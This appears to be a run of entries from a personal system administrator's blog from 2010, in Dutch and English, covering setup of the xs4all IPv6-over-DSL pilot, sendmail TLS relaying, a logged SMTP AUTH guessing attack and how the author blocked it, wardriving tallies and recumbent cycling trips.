=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.DMT Annex B  [ISDN Overlay Mode]
Channel Mode          :  interleaved 
Number of resets      :  1 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             ALCB             BDCM 
  VendorSpecific      :             0000             6291 
  StandardRevisionNr  :               01               01 

                                  Downstream        Upstream 
Margin       [dB]     :              8.5              8.0 
Attenuation  [dB]     :             24.0             11.5 
OutputPower  [dBm]    :             18.5             12.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            17962             7616 
  Upstream            :             2113              896 

Eens kijken of daar nog iets aan verandert met multimode:

[adsl]=>config opermode = multimode

Nee, gegevens blijven hetzelfde. Tijd om de speedtouch 546i om te programmeren naar pptp mode zodat die het werk kan doen. Dan heb ik ook weer adsl carrier stats.

With all the IPv6 configuration work something bothers me in ifconfig, it can still decide to stop showing IPv6 (inet6) addresses:

# ifconfig eth0.1
eth0.1    Link encap:Ethernet  HWaddr 00:1f:c6:59:76:f6  
          inet addr:10.42.2.1  Bcast:10.42.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17245335 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17342308 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:10403720060 (9.6 GB)  TX bytes:17783892122 (16.5 GB)

The addresses are there:

# ip -6 addr ls dev eth0.1
3: eth0.1@eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 
    inet6 2001:888:1011::694/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::21f:c6ff:fe59:76f6/64 scope link 
       valid_lft forever preferred_lft forever

Filed as Ubuntu bug 560807: ifconfig does not display inet6 addresses.
Update 2010-04-13: Problem source found, diff added to the bugreport.

Nu komt de stap om machines op het netwerk naar buiten werkend contact te laten maken. De server reageert nog niet op een dhcp6 sollicitation van de client en dat klopt ook wel want ik zie de dhcp group niet geaddresseerd staan in netstat -gn:

eth0.3          2      ff02::1:ff00:0
eth0.3          1      ff02::2
eth0.3          2      ff02::1:ff59:76f6
eth0.3          1      ff02::1

De dhcp6 requests gaan naar ff02::1:2

16:21:39.426238 00:1f:e1:45:28:94 (oui Unknown) > 33:33:00:01:00:02 (oui Unknown), ethertype IPv6 (0x86dd), length 134: fe80::21f:e1ff:fe45:2894.546 > ff02::1:2.547: dhcp6 solicit

Ook zie ik nog geen manier om radvd automatisch de juiste adressen op te laten pakken. Maar een van de mede xs4all IPv6 testers heeft al een scriptje gemaakt wat dat netjes doet.

Ok, een stap verder: Even geen dibbler. Toen het een beetje ging werken deelde dibbler de hele /48 uit aan zowel eth0.1 als eth0.3 via de gegenereerde radvd.conf. Dat was niet de bedoeling. Dus nu eens (na advies via irc) wide-dhcpv6 geprobeerd. Met een simpele config:

interface ppp0
{
        send ia-pd 0;

                script "/etc/wide-dhcpv6/dhcp6c-script";
};
id-assoc pd {
        prefix-interface eth0.1 {
                sla-id 1;
        };
        prefix-interface eth0.3 {
                sla-id 2;
        };
};

Heb ik correcte ip adressen:

eth0.1    Link encap:Ethernet  HWaddr 00:1f:c6:59:76:f6  
          inet addr:10.42.2.1  Bcast:10.42.2.255  Mask:255.255.255.0
          inet6 addr: 2001:980:111b:1:21f:c6ff:fe59:76f6/64 Scope:Global

eth0.3    Link encap:Ethernet  HWaddr 00:1f:c6:59:76:f6  
          inet addr:10.42.20.1  Bcast:10.42.20.255  Mask:255.255.255.0
          inet6 addr: 2001:980:111b:2:21f:c6ff:fe59:76f6/64 Scope:Global

En na het toevoegen van een scriptje /etc/ppp/ipv6-up.d/default met:

#!/bin/sh -e
if [ "${PPP_IPPARAM}" = "xs4all" ]; then
        ip route add 2000::0/3 dev ${PPP_IFACE} || true
fi
exit 0

Heb ik een werkende defaultroute en dus verbinding:

$ ping6 ping6.xs4all.nl
PING ping6.xs4all.nl(xs6.xs4all.nl) 56 data bytes
64 bytes from xs6.xs4all.nl: icmp_seq=1 ttl=62 time=16.8 ms
64 bytes from xs6.xs4all.nl: icmp_seq=2 ttl=62 time=16.7 ms

--- ping6.xs4all.nl ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1005ms
rtt min/avg/max/mdev = 16.787/16.795/16.804/0.129 ms

Het dhcp6c-script had maar gelijk de /etc/resolv.conf aangepast met de xs4all-v6 resolvers. Dus nu heb ik dat script aangepast om daar verder van af te blijven. Maar het is goed dat het werkt, dat maakt standalone autoconfiguratie mogelijk. Dat ik nou zo eigenwijs ben om mijn eigen resolver te draaien is een ander verhaal.

Ok, geleerd: syncppp en IPv6 gaan niet samen. Uit een gewoonte van lang geleden had ik sync aangezet voor pppd en pptp. Dat werkte dus niet. Dus nu ben ik een stap verder:

14:49:57.410595 IP6 (hlim 64, next-header UDP (17) payload length: 52) fe80::5ce9:5839:84c8:9771.546 > ff02::1:2.547: dhcp6 solicit (xid=b2c89c (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])
14:49:57.431702 IP6 (hlim 255, next-header UDP (17) payload length: 148) fe80::90:1a00:142:70eb.547 > fe80::5ce9:5839:84c8:9771.546: dhcp6 advertise (xid=b2c89c (server ID vid 00000a4c45333230)[|dhcp6ext])
14:49:59.430564 IP6 (hlim 64, next-header UDP (17) payload length: 79) fe80::5ce9:5839:84c8:9771.546 > ff02::1:2.547: dhcp6 request (xid=398aab (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])
14:49:59.455518 IP6 (hlim 255, next-header UDP (17) payload length: 148) fe80::90:1a00:142:70eb.547 > fe80::5ce9:5839:84c8:9771.546: dhcp6 reply (xid=398aab (server ID vid 00000a4c45333230)[|dhcp6ext])

De adsl verbinding heb ik nu omgelegd naar een ander adsl modem, een speedtouch 510i. Zo kan ik met een ander modem pptp mode testen en eventueel terug naar een known-good config op de 546i. Dat lukte toen alle kennis over speedtouch configuraties weer boven was. Op de Nederlandse speedtouch configuratie files pagina staat geen pptp setup voor de 510i (wel voor de 546i) maar die was te vinden op Speedtouch 510 v4 PPTP Relay Guide en na wat aanpassingen (xs4all gebruikt vcmux 8*48) prima te gebruiken. Dus ppp0 is nu up met IPv4 en linklocal IPv6:

Apr 11 13:28:59 greenblatt pppd[25425]: pppd 2.4.4 started by root, uid 0
Apr 11 13:28:59 greenblatt pppd[25425]: Using interface ppp0
Apr 11 13:28:59 greenblatt pppd[25425]: Connect: ppp0 <--> /dev/pts/10
Apr 11 13:29:01 greenblatt pppd[25425]: PAP authentication succeeded
Apr 11 13:29:01 greenblatt pppd[25425]: local  IP address 82.95.196.202
Apr 11 13:29:01 greenblatt pppd[25425]: remote IP address 194.109.5.227
Apr 11 13:29:01 greenblatt pppd[25425]: local  LL address fe80::ad68:ab18:01c4:c642
Apr 11 13:29:01 greenblatt pppd[25425]: remote LL address fe80::0090:1a00:0142:70eb

Maar nu IPv6 erbij. Aan de hand van Dibbler config for Xs4all IPv6 pilot /etc/dibbler/client.conf geconfigureerd voor prefix delegation:

# 8 (Debug) is most verbose. 7 (Info) is usually the best option
log-level 8
log-mode syslog

duid-type duid-ll

iface ppp0 {
# ask for address
    pd
}

Maar geen effect tot nog toe, volgens tcpdump krijg ik geen reactie:

14:04:48.620572 IP6 (hlim 64, next-header UDP (17) payload length: 52) fe80::ad68:ab18:1c4:c642.546 > ff02::1:2.547: dhcp6 solicit (xid=115e13 (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])
14:05:24.620567 IP6 (hlim 64, next-header UDP (17) payload length: 52) fe80::ad68:ab18:1c4:c642.546 > ff02::1:2.547: dhcp6 solicit (xid=115e13 (client ID hwaddr/time type 1 time 324301080 001fc65976f6)[|dhcp6ext])

Ik zie wel router advertisments van de andere kant:

14:20:58.998340 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::90:1a00:142:70eb > ff02::1: [icmp6 sum ok] ICMP6, router advertisement, length 24
        hop limit 0, Flags [none], pref medium, router lifetime 1800s, reachable time 0s, retrans time 0s
          mtu option (5), length 8 (1):  1500
            0x0000:  0000 0000 05dc

Maar ook dat heeft geen effect. Rustig verder zoeken.
Update : Speedtouch 510 ini file pptp mode for xs4all-only

Vandaag was een drukke werkdag en daardoor zag ik pas tegen het eind van de middag toen ik even op de Nokia E71 thuismail doorkeek dat ik mee doe aan de xs4all IPv6 pilot. Ik hoor dus niet bij de 'first ping!' mensen, maar gauw maar eens tijd maken om de configuratie rond te krijgen zodat ik native IPv4+IPv6 over DSL werkend krijg. Maar ik zie al een plek om te spieken: xs4all native ipv6 over dsl pptp settings.

Played a bit with QR codes in Google Chart Tools.

But you are already there.

En de goede vulling van het afgelopen weekend was... het jaarlijkse paastreffen van de ligfietsvereniging nvhpv op de camping Harskamperdennen.

• Vrijdag erheen gefietst, bij Vechten afgesproken met wat andere ligfietsers uit Zuid-Holland. Daar moest ik nog even mobiel Internet gebruiken om mezelf op te geven voor de xs4all IPv6 proef. Daarna via een leuke route richting Harskamp, daar de tent opgezet en 's avonds gegeten bij de chinees in Harskamp.
• Zaterdag ben ik er zelf op uitgegaan met de wardriving box achterop de fiets richting Wolfheze, Heelsum, Renkum, Bennekom en terug via Ede. Dat leverde maar liefst 4684 nieuwe netwerken op. Ik ben onderweg wel natgeregend, heb zelfs in Wolfheze een potje staan schuilen. Toen ik terugkwam was het ligfiets-ringsteken al geweest (had ik graag bij gefotografeerd, maargoed). Wel werd er nog een stunt uitgehaald met wat mooi versierde ligfietsen die ik wel op de gevoelige CCD kreeg.
• Zondag zou de georganiseerde toertocht zijn maar het weer was prutje en de toertocht werd afgelast. Toch zijn Mirjam en ik een stukje gaan fietsen door de bossen. Waar alles nat en modderig was, dus ik had een vieze fiets.
• Maandag terug liep eerst mijn ketting er af, toen schoot de kettingbuis weer los en bleef de ketting 'lastig' doen. Later in de rit brak zelfs mijn ketting. Gelukkig was er iemand met een kettingpons in de groep die de ketting gerepareerd heeft (schakels ertussenuit) waardoor de ketting ook minder slecht liep. Bij thuiskomst maar gelijk de fietsen uitgebreid schoongespoten en de kettingen gesmeerd. Toch ben ik denk ik toe aan een nieuwe ketting en tandwielen. En een kettingponsje is denk ik wel een goeie uitbreiding van de onderhoudsspullen bij mijn ligfiets.

De foto's die ik gemaakt heb: Paastreffen 2010 - Foto's Koos van den Hout
Alle hulde voor de organisatoren die er weer een prima evenement van gemaakt hebben!

As part of my work I need to be reachable and at the same time having mobile Internet access would be very handy. The solution was quite simple: a Nokia E71 with a mobile Internet access subscription. Getting it hooked up to the laptop with Ubuntu was dead easy.

Wat andere dingen kwamen ertussen waardoor ik er nog niet over schreef maar vorige week had ook nog belangrijk IPv6 nieuws: mijn provider xs4all zocht xs4all-only gebruikers die mee wilden doen aan een opgeschaalde IPv6 over DSL pilot. Ik was natuurlijk verplicht om een poging te doen om me voor die pilot in te schrijven. Dat kostte wat moeite omdat we toen onderweg waren, maar het is gelukt. Nu is het afwachten of ik mee mag doen met de pilot. Ik heb geen DSL modem wat ipv6 snapt maar ik wil een DSL modem in pptp mode configureren en dan op de server met een v6-aware pppd gaan werken en de zaak verder configureren.

My job has changed, in that I moved within the university to a different place. The department of computer science decided to cut back budget and get rid of their own system administrator group. We got relocated to one level 'up' in the organisational tree at the science-ict group which does ict for all departments (pharmacy, biology, chemistry, math, physics, computer science).

The SMTP auth attack was still going on this morning so I decided to play a bit with the sendmail access config:

SRV_Features:92.241.190.15 A

This disables offering AUTH to the specific attacking IP. The result was interesting in SMTP sessions:

220 kzdoos.xs4all.nl ESMTP Sendmail 8.14.2/8.14.2/Debian-2build1; Tue, 6 Apr 2010 08:25:06 +0200; (No UCE/UBE) logging access from: [92.241.190.15](FAIL)-[92.241.190.15]
9_@@
EHLO hbwgxr.com
250-kzdoos.xs4all.nl Hello [92.241.190.15], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-STARTTLS
250-DELIVERBY
250 HELP
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state
RSET
250 2.0.0 Reset state

The attacking script leaves out the authentication attempts and just goes on doing nothing. After a short while the attack from 92.241.190.15 stopped.

Interesting (for me) new type of account guessing attack: trying smtp accounts. I saw the following in the maillogs:

Apr  5 22:33:59 greenblatt sm-mta[19364]: o35KXpPO019364: [92.241.190.15]: possible SMTP attack: command=AUTH, count=7
Apr  5 22:34:08 greenblatt sm-mta[19082]: o35KVkYF019082: [92.241.190.15] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-v6

I was wondering what was happening on smtp level and used tcpdump to find out:

220 kzdoos.xs4all.nl ESMTP Sendmail 8.14.2/8.14.2/Debian-2build1; Mon, 5 Apr 2010 20:47:05 +0200; (No UCE/UBE) logging access from: [92.241.190.15](FAIL)-[92.241.190.15]
EHLO jtrmuwev.com
250-kzdoos.xs4all.nl Hello [92.241.190.15], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH DIGEST-MD5 CRAM-MD5
250-STARTTLS
250-DELIVERBY
250 HELP
AUTH CRAM-MD5
334 PDI3MjU0Mjc5OC4xMjIwMjEwMkBremRvb3MueHM0YWxsLm5sPg==
MTExIDk5ODY0YTY5YWI3ODIxMmI3YzgxMjhkOGFmNWM4MjUw
535 5.7.0 authentication failed
535 5.7.0 authentication failed
RSET
250 2.0.0 Reset state
AUTH CRAM-MD5
334 PDEyODQ3MDgxMTYuMTIyMDIxMDNAa3pkb29zLnhzNGFsbC5ubD4=
MTExIDU2YmU3OGYwMGE1MTA5ZmI4OWZmMDFhOGRmMDdjMTBh
535 5.7.0 authentication failed
535 5.7.0 authentication failed
RSET
250 2.0.0 Reset state
AUTH CRAM-MD5
334 PDE4OTQxOTc2MS4xMjIwMjEwNEBremRvb3MueHM0YWxsLm5sPg==
MTExIDE4YmEyYWY2M2MyYjA2Y2Q4OWUxMDE4Y2E2NjY3MmM1
535 5.7.0 authentication failed

The base64 encoded bits decode to:

<272542798.12202102@kzdoos.xs4all.nl>
111 99864a69ab78212b7c8128d8af5c8250

<1284708116.12202103@kzdoos.xs4all.nl>
111 56be78f00a5109fb89ff01a8df07c10a

<189419761.12202104@kzdoos.xs4all.nl>
111 18ba2af63c2b06cd89e1018ca66672c5

Which is normal challenge-response for CRAM-MD5 authentication. So my best guess is either trying to find valid accounts for other attacks in a way which does not hit a rate limiter (yet) which would mean a targeted attack or just a way to find an account for relaying spam.

Wardriving results 8 - 31 March: 4470 new networks with GPS locations.

Uitleg en achtergrond bij de CIOT teller die ik eerder noemde : Het CIOT opgeleukt - Jeroen van der Gun. Waar het rekenwerk nog even verder gaat: de kans dat van een gemiddelde Nederlander in 2009 telecommunicatie NAW gegevens door politie zijn opgevraagd: 17.8%. Dat is een hoop verdachten van misdrijven.

The upcoming shortage of IPv4 addresses and IPv6 seems to be a nice subject for some of the April-Fools items found today:

• AAISP first ISP to drop IPv4 Andrews & Arnold Ltd., UK ISP
• ICANN schaltet Rootserver ab - Alle IP-Adressen besetzt (German) where they will temporarily switch back to VideoText on pre-Internet computers.
• Internet addresses to void in 30 days - ComputerWeekly

There is a serious side: Within two years, shortage of IPv4 space will be for real.

Bij de volgende bijeenkomst van de hcc pc!gg netwerkgroep zit (natuurlijk) in de planning. De bijeenkomst van 5 juni zal volledig gaan over IPv6 en we gaan er diep op in, theorie en praktijk.

Enge teller bij Bits Of Freedom : Het aantal opvragingen bij het Centraal Informatiepunt Onderzoek Telecommunicatie (CIOT). Bewaarplicht telecomgegevens, Ciot opvragingen teller - Bits of Freedom.

Ok, sendmail locally on the laptop now works, but the next step is to get this to work from Thunderbird. I want Thunderbird to present the certificate to use the outgoing relay. To import a certificate into Thunderbird, I need to convert it to pkcs#12 format:

$ openssl pkcs12 -export -inkey thunderbird.pem -in machiavelli.idefix.net.crt -out thunderbird.p12 -name "Thunderbird op Machiavelli"
Enter pass phrase for thunderbird.pem:
Enter Export Password:
Verifying - Enter Export Password:

This gives me a .p12 file that Thunderbird understands so I can import it. But even when I set up Thunderbird to send the mail to the correct server on port 587 with TLS enabled it does not present its own certificate, resulting in a 'relaying denied' message (which is exactly what I want when the certificate is missing!). Time to search further. Maybe something in the certificate needs to match, but searching the Thunderbird help and on-line doesn't give hints.
As a backup I can let Thunderbird send to localhost:smtp and use the sendmail installation there to send it to the server (which it can) but then I can't see whether that worked when I close Thunderbird and disconnect the laptop. I'd rather have some visual conformation that mail is out the door.

Mirjam recently bought a new laptop and installed Linux on it (sofar nothing special) but we thought it would be nice if mail from the laptop would work from anywhere in the world. Using the information from Relaying with TLS in Sendmail, ubuntu sendmail and a bit of my own thinking this was not very hard. By default ubuntu hides the entire sendmail certificate creation and signing process, and I needed 'better' certificates signed by my own certificate authority. For the client side:

root@machiavelli:/etc/mail/tls# openssl req -new -key sendmail-common.key -out sendmail-client.csr 
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [NL]:
State or Province Name (full name) [Utrecht]:
Locality Name (eg, city) [Utrecht]:
Organization Name (eg, company) [idefix.net]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:machiavelli.idefix.net
Email Address []:koos@machiavelli.idefix.net

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Next I signed this csr using the idefix.net CA, and put the resulting client certificate back in /etc/mail/tls/sendmail-client.crt. On the client, /etc/mail/submit.mc had to be changed to use tls and talk directly to the right machine:

FEATURE(`msp', `postbode.idefix.net', `MSA')
include(`/etc/mail/tls/starttls.m4')dnl

Now for the server side I also generated a csr for the name postbode.idefix.net and signed it. I changed /etc/mail/sendmail.mc to do this correctly:

include(`/etc/mail/tls/starttls.m4')dnl
dnl #
dnl # fix debian weird choice

define(`confTLS_SRV_OPTIONS', `')dnl

And updated the /etc/mail/access map to relay based on the data from the idefix.net certificate:

# SSL magic
CERTIssuer:/C=NL/ST=Utrecht/L=Utrecht/O=idefix.net/OU=Certificate+20Authority/CN=idefix.net+20CA/emailAddress=hostmaster@idefix.net     RELAY

Testing it was harder from home which is normally a trusted network.. it just lost that role for a few minutes. And I noticed that when I use mail -v it will ask the upstream mailhost to also be verbose. As noted in the linked article logging is sparse. One hint in the headers of the relayed mail is:

Received: from machiavelli.idefix.net (wireless-machiavelli.idefix.net [IPv6:2001:888:1011:1:21f:e1ff:fe45:2894])
        by kzdoos.xs4all.nl (8.14.2/8.14.2/Debian-2build1) with ESMTP id o2UKFH9
X002890
        (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK)
        for XXXXXXXXXXXXXXX; Tue, 30 Mar 2010 22:15:18 +0200

Teken dat het echt slecht gaat met de accu van mijn Dell D630 laptop:

[   20.075680] ACPI: Battery Slot [BAT0] (battery absent)
[   20.075762] ACPI: Battery Slot [BAT1] (battery absent)

Volgens acpi (en volgens de dell setup) zit er helemaal geen accu in. En dat terwijl ik nog een screenshot wilde maken van de gnome battery applet die beweerde dat de accu aan vervanging toe was.

En het is bij IDG uitgevers nogsteeds niet doorgekomen dat ik echt geen spam van ze wil. Na eerdere afmeldpogingen in oktober 2009 zie ik net weer vrolijk nieuwe spam van ze staan, die weer liegt dat ik een relatie met Computer!Totaal zou hebben. Die heb ik niet meer sinds januari 2005, dus langer dan de termijn van twee jaar waarop 'bestaande relatie' een wettelijk geaccepteerde reden is, en ik heb ook al vaker pogingen gedaan van IDG af te komen.
Tijd voor wat klachten naar de juiste adressen, onder andere www.spamklacht.nl en het advies naar de provider van de verzendende mailserver om een kniptang toe te passen om herhaling te voorkomen. En naar de redactie van computer!totaal, misschien willen die eens schrijven over de spam-ergernis die computer!totaal en IDG uitgevers veroorzaken.
Update 2010-03-29 In ieder geval reageert er een redacteur dat de afmelding doorgegeven wordt aan de juiste persoon.

Brilliant remark by Matt Blaze when he announces his twitter url:

140 is the new 1536.

(For those who don't get it: it's a massive nerdjoke)

Vandaag was er een bijeenkomst van de pcgg netwerkgroep en dit keer had ik vantevoren wat scripts gemaakt en getest om de theoretische throughput van het dlan netwerk (netwerk over stopcontact) te meten. We hebben er op de lokatie altijd problemen mee, maar toen we er mee begonnen was het stabieler(!) dan de wifi. Dus een keer meten hoe erg het was en hoe het zich in de loop van de dag ontwikkelde leek mij nuttig. Met wat perl kon de output van dlanlist gemasseerd worden om in een rrdtool database te passen en daar uit worden weer grafiekjes gebouwd op dagen dat de 'router' actief is.

• DLAN throughput zaterdag 20 Maart. De verbetering van 'intern' aan het begin is omdat we de videoprojector in een ander stopcontact gestoken hebben. Dat 'extern' eerder wegvalt is omdat de netwerkkabel uit de dlan adapter gezakt was. Daar helpt niets tegen...
• DLAN throughput donderdag 18 Maart. Ter vergelijking, de test van de scripts thuis.

Uiteindelijk blijft het dus moeilijk op deze lokatie.
Bij langer meten zonder veel dataverkeer blijven er trouwens continue dezelfde waarden uit dlanlist komen. Thuis heb ik dat opgelost door even iperf in te zetten. Op de bijeenkomsten komt dat verkeer vanzelf.

A little oops at the Telegraph. Now fixed: Large Hadron Collider breaks energy record which is interesting science news.

Weer een onhandigheid in de blijkbaar vernieuwde Eneco website : Als je op 'mijn eneco' klikt komt er een login scherm overheen maar zodra je muis weer daar vanaf beweegt (in mijn geval omdat ik de juiste gegevens in de password store ging zoeken) is het login scherm gelijk weer weg. De workaround is om naar de oudere versie van de mijn eneco inlogpagina te gaan.
En gelijk ergernisje 2: ook als ik ingelogd ben in de mijn eneco omgeving moet ik op het formulier om bovenstaand te melden alsnog al mijn gegevens invullen. Dus nu heb ik 2 problemen met de website gemeld.

I walked in this morning at work with some people looking at me expectingly. About the third person was nice enough to explain: home directories and mail were unavailable. A quick look showed me that the home directory server was waiting for the ldap server and the ldap server showed a kernel panic on the console. Strangely enough the root ldap object was still available so the monitoring system did not notice it.
Anyway, server systems should not wait for the systems administrator after a panic in my opinion, they should be available. So I looked it up, and indeed: Linux Kernel panic reboot explains how simple it is to change this setting. So I changed all servers at work to give up after a panic and reboot. That should help availability. I'm not interested in the intimate details of a panic, I want working ldap. Yes, as several people noted to me, there are ways in which this can lead to a reboot-loop, for example when the panic is file-system related. I'll take that risk when it will 'fix' all other problems.

unix - linux - storage unixfoo is good at linux and netapp knowledge. I browsed it for a while and found lots of interesting stuff.

Handy unix utility which I had a hard time remembering today: watch. For some reason this is part of procps /proc file system utilities. I used watch to keep an eye on the number of USB storage devices seen by a computer because I was busy hooking up 28 of them at a time to 4 USB hubs and sometimes things were flaky, resulting in the famous usb 7-3.3: device not accepting address 83, error -32. The solution was to unplug and replug the USB device. Trying another hub helped too.

$ watch 'lsusb -t 2>&1| grep -c 0x090c'

This showed the number of USB storage devices (of the type I used) detected so I could plug them in and see whether detection went right.

Dankzij een motie die Arda Gerkens (SP) en Martijn van Dam (PvdA) willen gaan indienen gaat demissionair minister Maria van der Hoeven van Economische Zaken onderzoeken of de overheid bij aanbestedingen verplicht moet vragen naar IPv6.
Goed nieuws voor IPv6 acceptatie. Soms moet een overheid de aanmerkelijke macht inzetten om de markt even een sturing te geven in een richting die later nuttig is voor diezelfde markt.
Bron: Kamerleden @ArdaG en @martijnvdam zijn top. Besteden ook aandacht aan niet-sexy maar wel belangrijke zaken - Twitterbericht Erik Huizer.

One of our users at work reported today that he noticed the 'Previous Versions' tab in windows explorer being active and showing what we think of as the snapshots of the NetApp fileserver. I tried it myself on the windows 2008 terminal server and it works as it should. As my boss noted this is a very important step: having snapshots available is one thing, but having them available in the standard interface which (experienced) windows users can use makes quite a difference. Helpdesk page about filesystem snapshots updated.

Looking for that quiet, remote and very, very, very sturdy place to call home? Try the Atlas F missile base, Adirondack Mtns, NY with features like

The original, heavy security doors are built to withstand a 2000 lb blast and are at the underground home entrance.

and

Huge doors open to a large tunnel that accesses the silo that has an additional 20,000 square feet of useable space with unlimited possibilities. The perfect getaway home, it has its own direct runway access, its climate controlled and is capable of withstanding a nuclear hit.

The Silo has a climate constant/approx. 58 degree earth ambient temperature. It is 52' diameter x 178' deep / 9 floor steel superstructure. Entire steel superstructure hangs from gigantic spring suspension system designed to absorb shock of a direct nuclear hit.

It's also easy to reach:

it is part of an exclusive airport subdivision on a (FAA approved) 2050' runway. (It is fully accessable by road too).

Cheap too: only 2.3 million US dollar. Found via It's WAR - lovelylisting

Met alle aankomende wijzigingen op het werk hebben we besloten om de spamfiltering uit te besteden aan de surfnet mailfilter dienst. Die worden er voor betaald om de filtering dagelijks bij te houden en wij hebben er straks minder tijd voor. Totnogtoe was het natuurlijk altijd onze 'eigen' mailsetup en konden we zelf de spamstats bijhouden, en dat verliezen we.
We hebben eerst students.cs.uu.nl omgezet en vanmorgen cs.uu.nl. In de logs van de studentenmailserver viel me opeens op dat de smtpd ratelimiting (anvil) van postfix aansloeg op de surfnet mailfilters dus ik heb de surfnet mailfilter adressen toegevoegd aan de smtpd_client_event_limit_exceptions setting in postfix. Bij cs.uu.nl gebruiken we postfix, al van toen het nog vmailer heette. In sendmail zou ik voor die IP blokken andere ratelimits kunnen zetten maar postfix heeft blijkbaar alleen de opties default en geen ratelimits.

I made a lolcat: How many times do I need to ask to put the seat down!

De adsl aansluiting is tijden stabiel op 7968/1024 ipv 8000/1024. Met alles rond de aankomende xs4all snelheidsverhoging wilde ik weten of dit de maximale snelheid was die uit de lijn wilde komen. Ik heb in de logs terug zitten graven en sinds de omschakeling van fast op interleaved is 7968 de standaard snelheid. Daarvoor was de downloadsnelheid een tijdje instabiel. Verder lijken de specs ok:

                                  Downstream        Upstream 
Margin       [dB]     :             10.5             20.0 
Attenuation  [dB]     :             19.0             11.5 
OutputPower  [dBm]    :             19.0             12.5 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18792             7968 
  Upstream            :             2415             1024 

Als ik zo lees over adsl interleaving kan het toch wel kloppen dat de snelheid nu 7968 kilobit/seconde is en ga ik straks naar een hogere snelheid (ergens in de buurt van 16000 kilobit/seconde).
Update : Later bedacht ik me dat ik ooit de adsl config opermode had aangepast naar multimode om stabieler te zijn met adsl1. De grens van adsl1 zit ergens rond 8000 kilobit. Dus geprobeerd:

[adsl]=>config opermode = multi_adsl2plus

En nu zijn de specs:

                                  Downstream        Upstream 
Margin       [dB]     :              6.0             18.0 
Attenuation  [dB]     :             20.0             11.5 
OutputPower  [dBm]    :              2.0             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18879             8005 
  Upstream            :             2426             1029 

Ik ben benieuwd wat het oplevert als er straks 16000/1024 (nee, nogsteeds geen upstream verbetering..) ingesteld wordt. Mocht het tegenvallen dan heb ik de optie om het adsl modem wat nu op zolder staat een stuk dichter bij het aansluitpunt te plaatsen.

Blast from the past today: I tried to subscribe to a surfnet mailinglist and the response had this bit of information:

Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec                Device I/O:       19
 Overhead CPU:    0.016 sec                Paging I/O:      143
 CPU model:         2-CPU 2.5GHz Xeon L5420 6M (2048M)

I remember these lines in status messages when I first got in touch with mailing lists and listservers in 1992. Back then LISTSERV mostly ran on mainframes where this type of information at the end of a job was normal. Messages from LISTSERV used to have as subject back then "Output of job .." suggesting real batch processing.

Interesting weather this morning: snow started between 7 and 8, and it was nearly melted away again before 11. Overview on webcam.idefix.net Uithof archive Monday 8 March 2010.

Wardriving results 2 February - 7 March 2010: 4204 new networks with GPS locations according to WiGLE. Wardriving areas of the city I haven't visited in a while yields large numbers of new networks at the moment. I guess a lot of people have upgraded their wireless access-points.

Werk aan de ligfietsen dit weekend: bij Mirjam was er tijdens de afgelopen zomervakantie een spatbord afgelopen wat ik nog eens moest terugzetten na het repareren van de stukke popnagels (vervangen door m3 boutjes, inspiratie bij bevestiging spatborden vervangen - knurft.net). Bij mij was er iets ernstigers defect: de binnenkabel van de voorrem brak een paar dagen eerder. Ik heb die vervangen door een andere binnenkabel. Zondag zijn we een heel stuk gaan fietsen en toen ging ook de binnenkabel van de achterrem er aan. Op exact dezelfde manier: gebroken bij de schroef van de rem zelf. Ik had de kabels wat kort afgesteld om goed te kunnen remmen, maar daardoor maakte ik geen gebruik meer van de volle bocht van het draaiende deel van de schijfremklauwen. Dus maar even de fiets naar binnen en kijken of ik het kan repareren. Kabel vervangen, en toen ik de remklauw er af had liggen zag ik een stelschroefje op de remklauw 'L-PAD IN ⇒'. Daar eens aan gedraait maar dat zat nogal vast. Aan de andere kant een 'R-PAD in ⇒' en die wilde wel draaien. Daarmee blijk ik de fijnafstelling van de brakepads aan te kunnen passen. Dus ik heb de remklauw er weer opgeschroeft, de kabel beter afgesteld zodat de kans op breken minder is en vervolgens de brakepads aangedraaid. Nu onthouden dat ik ze eerst moet terugdraaien bij vervanging.

Searching for "idefix.net" to see whether it was listed in some overview of websites with certain vulnerable software I found this gem: idefix-net on Facebook Indonesia. I guess I have some sort of second career I never knew about.

It seems the Turkish provider ttnet.tr fell off the Internet for a few hours today. Since we volunteered ntp.cs.uu.nl for tr.pool.ntp.org the drop in traffic was very, very noticeable.

After a bit of searching I managed to get my Dell Latitude D630 laptop to use the audio buttons in fvwm.

Writing about security on your website has this interesting effect in the logs:

